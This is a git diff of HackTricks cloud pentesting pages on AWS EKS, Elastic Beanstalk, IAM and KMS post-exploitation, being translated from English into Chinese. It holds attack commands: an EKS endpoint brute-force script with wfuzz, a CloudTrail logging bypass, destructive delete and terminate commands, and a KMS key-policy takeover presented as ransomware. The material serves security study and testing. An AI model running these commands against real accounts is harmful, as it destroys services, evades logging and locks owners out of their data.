your own `~/.kube/config`**. However, having the token, you still need the **url endpoint to connect to** (if you managed to get a JWT token from a pod read [here](aws-eks-post-exploitation.md#get-api-server-endpoint-from-a-jwt-token)) and the **name of the cluster**. - -In my case, I didn't find the info in CloudWatch logs, but I **found it in LaunchTemaplates userData** and in **EC2 machines in userData also**. You can see this info in **userData** easily, for example in the next example (the cluster name was cluster-name): +如果你可以 **获取一个令牌** 使用 **`aws eks get-token --name `** 但你没有权限获取集群信息 (describeCluster),你可以 **准备你自己的 `~/.kube/config`**。然而,拥有令牌后,你仍然需要 **连接的 URL 端点** (如果你设法从一个 pod 获取了 JWT 令牌,请阅读 [这里](aws-eks-post-exploitation.md#get-api-server-endpoint-from-a-jwt-token)) 和 **集群的名称**。 +在我的案例中,我没有在 CloudWatch 日志中找到信息,但我 **在 LaunchTemplates 的 userData 中找到了它**,并且在 **EC2 机器的 userData 中也找到了**。你可以很容易地在 **userData** 中看到这些信息,例如在下一个示例中(集群名称是 cluster-name): ```bash API_SERVER_URL=https://6253F6CA47F81264D8E16FAA7A103A0D.gr7.us-east-1.eks.amazonaws.com /etc/eks/bootstrap.sh cluster-name --kubelet-extra-args '--node-labels=eks.amazonaws.com/sourceLaunchTemplateVersion=1,alpha.eksctl.io/cluster-name=cluster-name,alpha.eksctl.io/nodegroup-name=prd-ondemand-us-west-2b,role=worker,eks.amazonaws.com/nodegroup-image=ami-002539dd2c532d0a5,eks.amazonaws.com/capacityType=ON_DEMAND,eks.amazonaws.com/nodegroup=prd-ondemand-us-west-2b,type=ondemand,eks.amazonaws.com/sourceLaunchTemplateId=lt-0f0f0ba62bef782e5 --max-pods=58' --b64-cluster-ca $B64_CLUSTER_CA --apiserver-endpoint $API_SERVER_URL --dns-cluster-ip $K8S_CLUSTER_DNS_IP --use-max-pods false ``` -
-kube config - +kube 配置 ```yaml describe-cache-parametersapiVersion: v1 clusters: - - cluster: - certificate-authority-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUMvakNDQWVhZ0F3SUJBZ0lCQURBTkJna3Foa2lHOXcwQkFRc0ZBREFWTVJNd0VRWURWUVFERXdwcmRXSmwKY201bGRHVnpNQjRYRFRJeU1USXlPREUyTWpjek1Wb1hEVE15TVRJeU5URTJNamN6TVZvd0ZURVRNQkVHQTFVRQpBeE1LYTNWaVpYSnVaWFJsY3pDQ0FTSXdEUVlKS29aSWh2Y05BUUVCQlFBRGdnRVBBRENDQVFvQ2dnRUJBTDlXCk9OS0ZqeXZoRUxDZGhMNnFwWkMwa1d0UURSRVF1UzVpRDcwK2pjbjFKWXZ4a3FsV1ZpbmtwOUt5N2x2ME5mUW8KYkNqREFLQWZmMEtlNlFUWVVvOC9jQXJ4K0RzWVlKV3dzcEZGbWlsY1lFWFZHMG5RV1VoMVQ3VWhOanc0MllMRQpkcVpzTGg4OTlzTXRLT1JtVE5sN1V6a05pTlUzSytueTZSRysvVzZmbFNYYnRiT2kwcXJSeFVpcDhMdWl4WGRVCnk4QTg3VjRjbllsMXo2MUt3NllIV3hhSm11eWI5enRtbCtBRHQ5RVhOUXhDMExrdWcxSDBqdTl1MDlkU09YYlkKMHJxY2lINjYvSTh0MjlPZ3JwNkY0dit5eUNJUjZFQURRaktHTFVEWUlVSkZ4WXA0Y1pGcVA1aVJteGJ5Nkh3UwpDSE52TWNJZFZRRUNQMlg5R2c4Q0F3RUFBYU5aTUZjd0RnWURWUjBQQVFIL0JBUURBZ0trTUE4R0ExVWRFd0VCCi93UUZNQU1CQWY4d0hRWURWUjBPQkJZRUZQVXFsekhWZmlDd0xqalhPRmJJUUc3L0VxZ1hNQlVHQTFVZEVRUU8KTUF5Q0NtdDFZbVZ5Ym1WMFpYTXdEUVlKS29aSWh2Y05BUUVMQlFBRGdnRUJBS1o4c0l4aXpsemx0aXRPcGcySgpYV0VUSThoeWxYNWx6cW1mV0dpZkdFVVduUDU3UEVtWW55eWJHbnZ5RlVDbnczTldMRTNrbEVMQVE4d0tLSG8rCnBZdXAzQlNYamdiWFovdWVJc2RhWlNucmVqNU1USlJ3SVFod250ZUtpU0J4MWFRVU01ZGdZc2c4SlpJY3I2WC8KRG5POGlHOGxmMXVxend1dUdHSHM2R1lNR0Mvd1V0czVvcm1GS291SmtSUWhBZElMVkNuaStYNCtmcHUzT21UNwprS3VmR0tyRVlKT09VL1c2YTB3OTRycU9iSS9Mem1GSWxJQnVNcXZWVDBwOGtlcTc1eklpdGNzaUJmYVVidng3Ci9sMGhvS1RqM0IrOGlwbktIWW4wNGZ1R2F2YVJRbEhWcldDVlZ4c3ZyYWpxOUdJNWJUUlJ6TnpTbzFlcTVZNisKRzVBPQotLS0tLUVORCBDRVJUSUZJQ0FURS0tLS0tCg== - server: https://6253F6CA47F81264D8E16FAA7A103A0D.gr7.us-west-2.eks.amazonaws.com - name: arn:aws:eks:us-east-1::cluster/ +- cluster: +certificate-authority-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUMvakNDQWVhZ0F3SUJBZ0lCQURBTkJna3Foa2lHOXcwQkFRc0ZBREFWTVJNd0VRWURWUVFERXdwcmRXSmwKY201bGRHVnpNQjRYRFRJeU1USXlPREUyTWpjek1Wb1hEVE15TVRJeU5URTJNamN6TVZvd0ZURVRNQkVHQTFVRQpBeE1LYTNWaVpYSnVaWFJsY3pDQ0FTSXdEUVlKS29aSWh2Y05BUUVCQlFBRGdnRVBBRENDQVFvQ2dnRUJBTDlXCk9OS0ZqeXZoRUxDZGhMNnFwWkMwa1d0UURSRVF1UzVpRDcwK2pjbjFKWXZ4a3FsV1ZpbmtwOUt5N2x2ME5mUW8KYkNqREFLQWZmMEtlNlFUWVVvOC9jQXJ4K0RzWVlKV3dzcEZGbWlsY1lFWFZHMG5RV1VoMVQ3VWhOanc0MllMRQpkcVpzTGg4OTlzTXRLT1JtVE5sN1V6a05pTlUzSytueTZSRysvVzZmbFNYYnRiT2kwcXJSeFVpcDhMdWl4WGRVCnk4QTg3VjRjbllsMXo2MUt3NllIV3hhSm11eWI5enRtbCtBRHQ5RVhOUXhDMExrdWcxSDBqdTl1MDlkU09YYlkKMHJxY2lINjYvSTh0MjlPZ3JwNkY0dit5eUNJUjZFQURRaktHTFVEWUlVSkZ4WXA0Y1pGcVA1aVJteGJ5Nkh3UwpDSE52TWNJZFZRRUNQMlg5R2c4Q0F3RUFBYU5aTUZjd0RnWURWUjBQQVFIL0JBUURBZ0trTUE4R0ExVWRFd0VCCi93UUZNQU1CQWY4d0hRWURWUjBPQkJZRUZQVXFsekhWZmlDd0xqalhPRmJJUUc3L0VxZ1hNQlVHQTFVZEVRUU8KTUF5Q0NtdDFZbVZ5Ym1WMFpYTXdEUVlKS29aSWh2Y05BUUVMQlFBRGdnRUJBS1o4c0l4aXpsemx0aXRPcGcySgpYV0VUSThoeWxYNWx6cW1mV0dpZkdFVVduUDU3UEVtWW55eWJHbnZ5RlVDbnczTldMRTNrbEVMQVE4d0tLSG8rCnBZdXAzQlNYamdiWFovdWVJc2RhWlNucmVqNU1USlJ3SVFod250ZUtpU0J4MWFRVU01ZGdZc2c4SlpJY3I2WC8KRG5POGlHOGxmMXVxend1dUdHSHM2R1lNR0Mvd1V0czVvcm1GS291SmtSUWhBZElMVkNuaStYNCtmcHUzT21UNwprS3VmR0tyRVlKT09VL1c2YTB3OTRycU9iSS9Mem1GSWxJQnVNcXZWVDBwOGtlcTc1eklpdGNzaUJmYVVidng3Ci9sMGhvS1RqM0IrOGlwbktIWW4wNGZ1R2F2YVJRbEhWcldDVlZ4c3ZyYWpxOUdJNWJUUlJ6TnpTbzFlcTVZNisKRzVBPQotLS0tLUVORCBDRVJUSUZJQ0FURS0tLS0tCg== +server: https://6253F6CA47F81264D8E16FAA7A103A0D.gr7.us-west-2.eks.amazonaws.com +name: arn:aws:eks:us-east-1::cluster/ contexts: - - context: - cluster: arn:aws:eks:us-east-1::cluster/ - user: arn:aws:eks:us-east-1::cluster/ - name: arn:aws:eks:us-east-1::cluster/ +- context: +cluster: arn:aws:eks:us-east-1::cluster/ +user: arn:aws:eks:us-east-1::cluster/ +name: arn:aws:eks:us-east-1::cluster/ current-context: arn:aws:eks:us-east-1::cluster/ kind: Config preferences: {} users: - - name: arn:aws:eks:us-east-1::cluster/ - user: - exec: - apiVersion: client.authentication.k8s.io/v1beta1 - args: - - --region - - us-west-2 - - --profile - - - - eks - - get-token - - --cluster-name - - - command: aws - env: null - interactiveMode: IfAvailable - provideClusterInfo: false +- name: arn:aws:eks:us-east-1::cluster/ +user: +exec: +apiVersion: client.authentication.k8s.io/v1beta1 +args: +- --region +- us-west-2 +- --profile +- +- eks +- get-token +- --cluster-name +- +command: aws +env: null +interactiveMode: IfAvailable +provideClusterInfo: false ``` -
-### From AWS to Kubernetes +### 从 AWS 到 Kubernetes -The **creator** of the **EKS cluster** is **ALWAYS** going to be able to get into the kubernetes cluster part of the group **`system:masters`** (k8s admin). At the time of this writing there is **no direct way** to find **who created** the cluster (you can check CloudTrail). And the is **no way** to **remove** that **privilege**. +**EKS 集群**的**创建者****总是**能够进入**`system:masters`**组的 Kubernetes 集群部分(k8s 管理员)。在撰写本文时,**没有直接的方法**来查找**谁创建了**该集群(您可以检查 CloudTrail)。并且**无法****移除**该**权限**。 -The way to grant **access to over K8s to more AWS IAM users or roles** is using the **configmap** **`aws-auth`**. +授予**更多 AWS IAM 用户或角色对 K8s 的访问权限**的方法是使用**configmap** **`aws-auth`**。 > [!WARNING] -> Therefore, anyone with **write access** over the config map **`aws-auth`** will be able to **compromise the whole cluster**. +> 因此,任何对 config map **`aws-auth`**具有**写访问权限**的人都将能够**危害整个集群**。 -For more information about how to **grant extra privileges to IAM roles & users** in the **same or different account** and how to **abuse** this to [**privesc check this page**](../../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/#aws-eks-aws-auth-configmaps). +有关如何在**同一或不同账户**中**授予 IAM 角色和用户额外权限**以及如何**滥用**此权限的更多信息,请查看[**privesc 检查此页面**](../../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/#aws-eks-aws-auth-configmaps)。 -Check also[ **this awesome**](https://blog.lightspin.io/exploiting-eks-authentication-vulnerability-in-aws-iam-authenticator) **post to learn how the authentication IAM -> Kubernetes work**. +还可以查看[**这篇精彩的**](https://blog.lightspin.io/exploiting-eks-authentication-vulnerability-in-aws-iam-authenticator) **文章以了解 IAM -> Kubernetes 的身份验证是如何工作的**。 -### From Kubernetes to AWS +### 从 Kubernetes 到 AWS -It's possible to allow an **OpenID authentication for kubernetes service account** to allow them to assume roles in AWS. Learn how [**this work in this page**](../../kubernetes-security/kubernetes-pivoting-to-clouds.md#workflow-of-iam-role-for-service-accounts-1). +可以允许**Kubernetes 服务账户的 OpenID 身份验证**以允许它们在 AWS 中承担角色。了解[**这在此页面中的工作原理**](../../kubernetes-security/kubernetes-pivoting-to-clouds.md#workflow-of-iam-role-for-service-accounts-1)。 -### GET Api Server Endpoint from a JWT Token - -Decoding the JWT token we get the cluster id & also the region. ![image](https://github.com/HackTricks-wiki/hacktricks-cloud/assets/87022719/0e47204a-eea5-4fcb-b702-36dc184a39e9) Knowing that the standard format for EKS url is +### 从 JWT 令牌获取 Api 服务器端点 +解码 JWT 令牌,我们获得集群 ID 和区域。![image](https://github.com/HackTricks-wiki/hacktricks-cloud/assets/87022719/0e47204a-eea5-4fcb-b702-36dc184a39e9) 知道 EKS URL 的标准格式是 ```bash https://...eks.amazonaws.com ``` - -Didn't find any documentation that explain the criteria for the 'two chars' and the 'number'. But making some test on my behalf I see recurring these one: +没有找到任何文档来解释“两个字符”和“数字”的标准。但我自己进行了一些测试,发现这些是重复出现的: - gr7 - yl4 -Anyway are just 3 chars we can bruteforce them. Use the below script for generating the list - +无论如何,这只是3个字符,我们可以对它们进行暴力破解。使用下面的脚本生成列表。 ```python from itertools import product from string import ascii_lowercase @@ -116,44 +107,37 @@ letter_combinations = product('abcdefghijklmnopqrstuvwxyz', repeat = 2) number_combinations = product('0123456789', repeat = 1) result = [ - f'{''.join(comb[0])}{comb[1][0]}' - for comb in product(letter_combinations, number_combinations) +f'{''.join(comb[0])}{comb[1][0]}' +for comb in product(letter_combinations, number_combinations) ] with open('out.txt', 'w') as f: - f.write('\n'.join(result)) +f.write('\n'.join(result)) ``` - -Then with wfuzz - +然后使用 wfuzz ```bash wfuzz -Z -z file,out.txt --hw 0 https://.FUZZ..eks.amazonaws.com ``` - > [!WARNING] -> Remember to replace & . +> 记得替换 & 。 -### Bypass CloudTrail +### 绕过 CloudTrail -If an attacker obtains credentials of an AWS with **permission over an EKS**. If the attacker configures it's own **`kubeconfig`** (without calling **`update-kubeconfig`**) as explained previously, the **`get-token`** doesn't generate logs in Cloudtrail because it doesn't interact with the AWS API (it just creates the token locally). +如果攻击者获得了具有 **EKS 权限** 的 AWS 凭证。如果攻击者配置自己的 **`kubeconfig`**(不调用 **`update-kubeconfig`**),如前所述,**`get-token`** 不会在 CloudTrail 中生成日志,因为它不与 AWS API 交互(它只是本地创建令牌)。 -So when the attacker talks with the EKS cluster, **cloudtrail won't log anything related to the user being stolen and accessing it**. +因此,当攻击者与 EKS 集群交互时,**cloudtrail 不会记录与被盗用户及其访问相关的任何内容**。 -Note that the **EKS cluster might have logs enabled** that will log this access (although, by default, they are disabled). +请注意,**EKS 集群可能启用了日志**,将记录此访问(尽管默认情况下,它们是禁用的)。 -### EKS Ransom? +### EKS 勒索? -By default the **user or role that created** a cluster is **ALWAYS going to have admin privileges** over the cluster. And that the only "secure" access AWS will have over the Kubernetes cluster. +默认情况下,**创建**集群的 **用户或角色** **始终拥有集群的管理员权限**。这是 AWS 对 Kubernetes 集群的唯一“安全”访问。 -So, if an **attacker compromises a cluster using fargate** and **removes all the other admins** and d**eletes the AWS user/role that created** the Cluster, ~~the attacker could have **ransomed the cluste**~~**r**. +因此,如果 **攻击者通过 Fargate 破坏了集群**,并 **删除了所有其他管理员**,并 **删除了创建**集群的 AWS 用户/角色,~~攻击者可能已经 **勒索了集群**~~**。 > [!TIP] -> Note that if the cluster was using **EC2 VMs**, it could be possible to get Admin privileges from the **Node** and recover the cluster. +> 请注意,如果集群使用 **EC2 虚拟机**,则可能从 **节点** 获取管理员权限并恢复集群。 > -> Actually, If the cluster is using Fargate you could EC2 nodes or move everything to EC2 to the cluster and recover it accessing the tokens in the node. +> 实际上,如果集群使用 Fargate,您可以将 EC2 节点或将所有内容移动到 EC2 集群并通过访问节点中的令牌来恢复它。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md index 6267ee02f..6bbb031b8 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md @@ -1,10 +1,10 @@ -# AWS - Elastic Beanstalk Post Exploitation +# AWS - Elastic Beanstalk 后期利用 {{#include ../../../banners/hacktricks-training.md}} ## Elastic Beanstalk -For more information: +更多信息: {{#ref}} ../aws-services/aws-elastic-beanstalk-enum.md @@ -13,72 +13,58 @@ For more information: ### `elasticbeanstalk:DeleteApplicationVersion` > [!NOTE] -> TODO: Test if more permissions are required for this - -An attacker with the permission `elasticbeanstalk:DeleteApplicationVersion` can **delete an existing application version**. This action could disrupt application deployment pipelines or cause loss of specific application versions if not backed up. +> TODO: 测试是否需要更多权限 +拥有权限 `elasticbeanstalk:DeleteApplicationVersion` 的攻击者可以 **删除现有的应用程序版本**。此操作可能会中断应用程序部署管道或导致特定应用程序版本的丢失(如果没有备份)。 ```bash aws elasticbeanstalk delete-application-version --application-name my-app --version-label my-version ``` - -**Potential Impact**: Disruption of application deployment and potential loss of application versions. +**潜在影响**:应用程序部署中断和潜在的应用程序版本丢失。 ### `elasticbeanstalk:TerminateEnvironment` > [!NOTE] -> TODO: Test if more permissions are required for this - -An attacker with the permission `elasticbeanstalk:TerminateEnvironment` can **terminate an existing Elastic Beanstalk environment**, causing downtime for the application and potential data loss if the environment is not configured for backups. +> TODO: 测试是否需要更多权限 +拥有权限 `elasticbeanstalk:TerminateEnvironment` 的攻击者可以**终止现有的 Elastic Beanstalk 环境**,导致应用程序停机,并且如果环境未配置备份,可能会导致数据丢失。 ```bash aws elasticbeanstalk terminate-environment --environment-name my-existing-env ``` - -**Potential Impact**: Downtime of the application, potential data loss, and disruption of services. +**潜在影响**:应用程序的停机、潜在的数据丢失和服务中断。 ### `elasticbeanstalk:DeleteApplication` > [!NOTE] -> TODO: Test if more permissions are required for this - -An attacker with the permission `elasticbeanstalk:DeleteApplication` can **delete an entire Elastic Beanstalk application**, including all its versions and environments. This action could cause a significant loss of application resources and configurations if not backed up. +> TODO: 测试是否需要更多权限 +拥有权限 `elasticbeanstalk:DeleteApplication` 的攻击者可以**删除整个 Elastic Beanstalk 应用程序**,包括其所有版本和环境。如果没有备份,此操作可能导致应用程序资源和配置的重大损失。 ```bash aws elasticbeanstalk delete-application --application-name my-app --terminate-env-by-force ``` - -**Potential Impact**: Loss of application resources, configurations, environments, and application versions, leading to service disruption and potential data loss. +**潜在影响**:应用程序资源、配置、环境和应用程序版本的丢失,导致服务中断和潜在的数据丢失。 ### `elasticbeanstalk:SwapEnvironmentCNAMEs` > [!NOTE] -> TODO: Test if more permissions are required for this - -An attacker with the `elasticbeanstalk:SwapEnvironmentCNAMEs` permission can **swap the CNAME records of two Elastic Beanstalk environments**, which might cause the wrong version of the application to be served to users or lead to unintended behavior. +> TODO: 测试是否需要更多权限 +拥有 `elasticbeanstalk:SwapEnvironmentCNAMEs` 权限的攻击者可以**交换两个 Elastic Beanstalk 环境的 CNAME 记录**,这可能导致错误版本的应用程序被提供给用户或导致意外行为。 ```bash aws elasticbeanstalk swap-environment-cnames --source-environment-name my-env-1 --destination-environment-name my-env-2 ``` - -**Potential Impact**: Serving the wrong version of the application to users or causing unintended behavior in the application due to swapped environments. +**潜在影响**:向用户提供错误版本的应用程序或由于环境交换导致应用程序出现意外行为。 ### `elasticbeanstalk:AddTags`, `elasticbeanstalk:RemoveTags` > [!NOTE] -> TODO: Test if more permissions are required for this - -An attacker with the `elasticbeanstalk:AddTags` and `elasticbeanstalk:RemoveTags` permissions can **add or remove tags on Elastic Beanstalk resources**. This action could lead to incorrect resource allocation, billing, or resource management. +> TODO: 测试是否需要更多权限 +拥有 `elasticbeanstalk:AddTags` 和 `elasticbeanstalk:RemoveTags` 权限的攻击者可以**在 Elastic Beanstalk 资源上添加或删除标签**。此操作可能导致资源分配、计费或资源管理不正确。 ```bash aws elasticbeanstalk add-tags --resource-arn arn:aws:elasticbeanstalk:us-west-2:123456789012:environment/my-app/my-env --tags Key=MaliciousTag,Value=1 aws elasticbeanstalk remove-tags --resource-arn arn:aws:elasticbeanstalk:us-west-2:123456789012:environment/my-app/my-env --tag-keys MaliciousTag ``` - -**Potential Impact**: Incorrect resource allocation, billing, or resource management due to added or removed tags. +**潜在影响**:由于添加或删除标签,导致资源分配、计费或资源管理不正确。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md index f734122e8..97a579f6c 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md @@ -4,7 +4,7 @@ ## IAM -For more information about IAM access: +有关 IAM 访问的更多信息: {{#ref}} ../aws-services/aws-iam-enum.md @@ -12,96 +12,82 @@ For more information about IAM access: ## Confused Deputy Problem -If you **allow an external account (A)** to access a **role** in your account, you will probably have **0 visibility** on **who can exactly access that external account**. This is a problem, because if another external account (B) can access the external account (A) it's possible that **B will also be able to access your account**. +如果您**允许一个外部账户 (A)** 访问您账户中的**角色**,您可能对**谁可以确切访问该外部账户**几乎没有**可见性**。这是一个问题,因为如果另一个外部账户 (B) 可以访问外部账户 (A),那么**B 也可能能够访问您的账户**。 -Therefore, when allowing an external account to access a role in your account it's possible to specify an `ExternalId`. This is a "secret" string that the external account (A) **need to specify** in order to **assume the role in your organization**. As the **external account B won't know this string**, even if he has access over A he **won't be able to access your role**. +因此,在允许外部账户访问您账户中的角色时,可以指定一个 `ExternalId`。这是一个“秘密”字符串,外部账户 (A) **需要指定**以**假设您组织中的角色**。由于**外部账户 B 不会知道这个字符串**,即使他可以访问 A,他也**无法访问您的角色**。
-However, note that this `ExternalId` "secret" is **not a secret**, anyone that can **read the IAM assume role policy will be able to see it**. But as long as the external account A knows it, but the external account **B doesn't know it**, it **prevents B abusing A to access your role**. - -Example: +但是,请注意,这个 `ExternalId` “秘密”**并不是秘密**,任何可以**读取 IAM 假设角色策略的人都能看到它**。但只要外部账户 A 知道它,而外部账户 **B 不知道它**,就**可以防止 B 利用 A 访问您的角色**。 +示例: ```json { - "Version": "2012-10-17", - "Statement": { - "Effect": "Allow", - "Principal": { - "AWS": "Example Corp's AWS Account ID" - }, - "Action": "sts:AssumeRole", - "Condition": { - "StringEquals": { - "sts:ExternalId": "12345" - } - } - } +"Version": "2012-10-17", +"Statement": { +"Effect": "Allow", +"Principal": { +"AWS": "Example Corp's AWS Account ID" +}, +"Action": "sts:AssumeRole", +"Condition": { +"StringEquals": { +"sts:ExternalId": "12345" +} +} +} } ``` - > [!WARNING] -> For an attacker to exploit a confused deputy he will need to find somehow if principals of the current account can impersonate roles in other accounts. +> 攻击者要利用混淆的副手,他需要以某种方式查找当前账户的主体是否可以在其他账户中冒充角色。 -### Unexpected Trusts - -#### Wildcard as principal +### 意外的信任 +#### 通配符作为主体 ```json { - "Action": "sts:AssumeRole", - "Effect": "Allow", - "Principal": { "AWS": "*" } +"Action": "sts:AssumeRole", +"Effect": "Allow", +"Principal": { "AWS": "*" } } ``` +此策略**允许所有AWS**承担该角色。 -This policy **allows all AWS** to assume the role. - -#### Service as principal - +#### 服务作为主体 ```json { - "Action": "lambda:InvokeFunction", - "Effect": "Allow", - "Principal": { "Service": "apigateway.amazonaws.com" }, - "Resource": "arn:aws:lambda:000000000000:function:foo" +"Action": "lambda:InvokeFunction", +"Effect": "Allow", +"Principal": { "Service": "apigateway.amazonaws.com" }, +"Resource": "arn:aws:lambda:000000000000:function:foo" } ``` +此策略**允许任何账户**配置其 apigateway 以调用此 Lambda。 -This policy **allows any account** to configure their apigateway to call this Lambda. - -#### S3 as principal - +#### S3 作为主体 ```json "Condition": { "ArnLike": { "aws:SourceArn": "arn:aws:s3:::source-bucket" }, - "StringEquals": { - "aws:SourceAccount": "123456789012" - } +"StringEquals": { +"aws:SourceAccount": "123456789012" +} } ``` +如果将 S3 存储桶作为主体,因为 S3 存储桶没有账户 ID,如果你**删除了你的存储桶而攻击者在他们自己的账户中创建了它**,那么他们可能会利用这一点。 -If an S3 bucket is given as a principal, because S3 buckets do not have an Account ID, if you **deleted your bucket and the attacker created** it in their own account, then they could abuse this. - -#### Not supported - +#### 不支持 ```json { - "Effect": "Allow", - "Principal": { "Service": "cloudtrail.amazonaws.com" }, - "Action": "s3:PutObject", - "Resource": "arn:aws:s3:::myBucketName/AWSLogs/MY_ACCOUNT_ID/*" +"Effect": "Allow", +"Principal": { "Service": "cloudtrail.amazonaws.com" }, +"Action": "s3:PutObject", +"Resource": "arn:aws:s3:::myBucketName/AWSLogs/MY_ACCOUNT_ID/*" } ``` - -A common way to avoid Confused Deputy problems is the use of a condition with `AWS:SourceArn` to check the origin ARN. However, **some services might not support that** (like CloudTrail according to some sources). +避免 Confused Deputy 问题的常见方法是使用带有 `AWS:SourceArn` 的条件来检查源 ARN。然而,**某些服务可能不支持这一点**(根据一些来源,如 CloudTrail)。 ## References - [https://docs.aws.amazon.com/IAM/latest/UserGuide/confused-deputy.html](https://docs.aws.amazon.com/IAM/latest/UserGuide/confused-deputy.html) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md index 482af5425..d6bf5bc4c 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md @@ -1,137 +1,125 @@ -# AWS - KMS Post Exploitation +# AWS - KMS 后期利用 {{#include ../../../banners/hacktricks-training.md}} ## KMS -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-kms-enum.md {{#endref}} -### Encrypt/Decrypt information +### 加密/解密信息 -`fileb://` and `file://` are URI schemes used in AWS CLI commands to specify the path to local files: +`fileb://` 和 `file://` 是在 AWS CLI 命令中用于指定本地文件路径的 URI 方案: -- `fileb://:` Reads the file in binary mode, commonly used for non-text files. -- `file://:` Reads the file in text mode, typically used for plain text files, scripts, or JSON that doesn't have special encoding requirements. +- `fileb://:` 以二进制模式读取文件,通常用于非文本文件。 +- `file://:` 以文本模式读取文件,通常用于纯文本文件、脚本或没有特殊编码要求的 JSON。 > [!TIP] -> Note that if you want to decrypt some data inside a file, the file must contain the binary data, not base64 encoded data. (fileb://) - -- Using a **symmetric** key +> 请注意,如果您想解密文件中的某些数据,文件必须包含二进制数据,而不是 base64 编码的数据。 (fileb://) +- 使用 **对称** 密钥 ```bash # Encrypt data aws kms encrypt \ - --key-id f0d3d719-b054-49ec-b515-4095b4777049 \ - --plaintext fileb:///tmp/hello.txt \ - --output text \ - --query CiphertextBlob | base64 \ - --decode > ExampleEncryptedFile +--key-id f0d3d719-b054-49ec-b515-4095b4777049 \ +--plaintext fileb:///tmp/hello.txt \ +--output text \ +--query CiphertextBlob | base64 \ +--decode > ExampleEncryptedFile # Decrypt data aws kms decrypt \ - --ciphertext-blob fileb://ExampleEncryptedFile \ - --key-id f0d3d719-b054-49ec-b515-4095b4777049 \ - --output text \ - --query Plaintext | base64 \ - --decode +--ciphertext-blob fileb://ExampleEncryptedFile \ +--key-id f0d3d719-b054-49ec-b515-4095b4777049 \ +--output text \ +--query Plaintext | base64 \ +--decode ``` - -- Using a **asymmetric** key: - +- 使用 **非对称** 密钥: ```bash # Encrypt data aws kms encrypt \ - --key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \ - --encryption-algorithm RSAES_OAEP_SHA_256 \ - --plaintext fileb:///tmp/hello.txt \ - --output text \ - --query CiphertextBlob | base64 \ - --decode > ExampleEncryptedFile +--key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \ +--encryption-algorithm RSAES_OAEP_SHA_256 \ +--plaintext fileb:///tmp/hello.txt \ +--output text \ +--query CiphertextBlob | base64 \ +--decode > ExampleEncryptedFile # Decrypt data aws kms decrypt \ - --ciphertext-blob fileb://ExampleEncryptedFile \ - --encryption-algorithm RSAES_OAEP_SHA_256 \ - --key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \ - --output text \ - --query Plaintext | base64 \ - --decode +--ciphertext-blob fileb://ExampleEncryptedFile \ +--encryption-algorithm RSAES_OAEP_SHA_256 \ +--key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \ +--output text \ +--query Plaintext | base64 \ +--decode ``` +### KMS 勒索软件 -### KMS Ransomware +拥有 KMS 特权访问权限的攻击者可以修改密钥的 KMS 策略并**授予他的账户访问权限**,同时移除授予合法账户的访问权限。 -An attacker with privileged access over KMS could modify the KMS policy of keys and **grant his account access over them**, removing the access granted to the legit account. - -Then, the legit account users won't be able to access any informatcion of any service that has been encrypted with those keys, creating an easy but effective ransomware over the account. +这样,合法账户的用户将无法访问任何使用这些密钥加密的服务的信息,从而在账户上创建一个简单但有效的勒索软件。 > [!WARNING] -> Note that **AWS managed keys aren't affected** by this attack, only **Customer managed keys**. - -> Also note the need to use the param **`--bypass-policy-lockout-safety-check`** (the lack of this option in the web console makes this attack only possible from the CLI). +> 请注意,**AWS 管理的密钥不受此攻击影响**,只有**客户管理的密钥**。 +> 还请注意需要使用参数 **`--bypass-policy-lockout-safety-check`**(在网页控制台中缺少此选项使得此攻击仅能通过 CLI 实现)。 ```bash # Force policy change aws kms put-key-policy --key-id mrk-c10357313a644d69b4b28b88523ef20c \ - --policy-name default \ - --policy file:///tmp/policy.yaml \ - --bypass-policy-lockout-safety-check +--policy-name default \ +--policy file:///tmp/policy.yaml \ +--bypass-policy-lockout-safety-check { - "Id": "key-consolepolicy-3", - "Version": "2012-10-17", - "Statement": [ - { - "Sid": "Enable IAM User Permissions", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam:::root" - }, - "Action": "kms:*", - "Resource": "*" - } - ] +"Id": "key-consolepolicy-3", +"Version": "2012-10-17", +"Statement": [ +{ +"Sid": "Enable IAM User Permissions", +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam:::root" +}, +"Action": "kms:*", +"Resource": "*" +} +] } ``` - > [!CAUTION] -> Note that if you change that policy and only give access to an external account, and then from this external account you try to set a new policy to **give the access back to original account, you won't be able**. +> 注意,如果您更改该策略并仅向外部帐户授予访问权限,然后从该外部帐户尝试设置新策略以**将访问权限恢复到原始帐户,您将无法**。
